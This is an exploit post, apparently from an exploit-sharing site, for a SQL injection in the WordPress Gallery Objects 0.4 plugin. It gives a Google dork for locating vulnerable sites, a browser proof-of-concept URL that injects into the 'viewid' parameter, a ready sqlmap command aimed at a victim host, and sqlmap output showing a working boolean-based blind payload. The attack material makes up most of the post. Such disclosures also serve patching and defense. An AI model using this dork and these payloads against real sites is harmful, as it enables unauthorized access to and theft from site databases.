facebook facebook twitter rss

Wordpress Gallery Objects 0.4 SQL Injection vulnerability

Author: Killer~X , Published: 05-10-2014
 ############../ By Killer~X /..###############
# Wordpress Gallery Objects 0.4 SQL Injection vulnerability

Exploit Author : Killer~X

Tested on :
Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0

===================================================#
Dork Google : inurl:/admin-ajax.php?action=go_view_object

Poc via Browser:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html

sqlmap :
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid

---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
=====================================================#

Greetz to : All YEA Members - Killer~X

https://twitter.com/killerx00x

https://www.facebook.com/xXalreshyXx

###########../ By Killer~X /..#################

Like us on Facebook :